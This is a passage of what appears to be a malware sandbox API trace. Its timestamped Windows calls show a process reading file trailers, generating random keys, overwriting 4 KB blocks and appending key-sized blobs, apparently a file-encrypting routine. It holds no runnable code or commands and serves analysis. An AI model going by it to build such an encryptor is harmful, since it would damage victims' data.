returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d8f0d0 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.895] GetProcessHeap () returned 0x4f10000 [0074.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0074.895] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.895] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x728fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.896] WriteFile (in: hFile=0x7a4, lpBuffer=0x728fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x728fd48*, lpNumberOfBytesWritten=0x728fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.896] GetProcessHeap () returned 0x4f10000 [0074.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d738a0 | out: hHeap=0x4f10000) returned 1 [0074.896] GetProcessHeap () returned 0x4f10000 [0074.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0074.896] GetProcessHeap () returned 0x4f10000 [0074.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0074.896] CloseHandle (hObject=0x7a4) returned 1 [0074.897] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 0 [0074.897] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.897] ReadFile (in: hFile=0x7a8, lpBuffer=0x728fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x728fd4c*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.897] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.897] GetProcessHeap () returned 0x4f10000 [0074.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0074.897] GetProcessHeap () returned 0x4f10000 [0074.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0074.897] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0074.897] GetProcessHeap () returned 0x4f10000 [0074.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d738a0 [0074.897] ReadFile (in: hFile=0x7a8, lpBuffer=0x7d738a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x7d738a0*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.897] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.898] GetProcessHeap () returned 0x4f10000 [0074.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.899] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bbc8 [0074.899] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bbc8 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.900] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.901] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.901] GetProcessHeap () returned 0x4f10000 [0074.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d8f0d0 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.902] GetProcessHeap () returned 0x4f10000 [0074.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0074.902] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.902] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x728fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.903] WriteFile (in: hFile=0x7a8, lpBuffer=0x728fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x728fd48*, lpNumberOfBytesWritten=0x728fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.903] GetProcessHeap () returned 0x4f10000 [0074.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d738a0 | out: hHeap=0x4f10000) returned 1 [0074.903] GetProcessHeap () returned 0x4f10000 [0074.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0074.903] GetProcessHeap () returned 0x4f10000 [0074.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0074.903] CloseHandle (hObject=0x7a8) returned 1 [0074.904] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 1 [0074.904] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.904] ReadFile (in: hFile=0x7b0, lpBuffer=0x728fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x728fd4c*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.904] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.904] GetProcessHeap () returned 0x4f10000 [0074.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0074.904] GetProcessHeap () returned 0x4f10000 [0074.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0074.904] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0074.904] GetProcessHeap () returned 0x4f10000 [0074.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d738a0 [0074.904] ReadFile (in: hFile=0x7b0, lpBuffer=0x7d738a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x7d738a0*, lpNumberOfBytesRead=0x728fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.975] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.975] WriteFile (in: hFile=0x7b0, lpBuffer=0x7d738a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d738a0*, lpNumberOfBytesWritten=0x728fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.975] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.976] GetProcessHeap () returned 0x4f10000 [0074.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bbc8 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0074.977] GetProcessHeap () 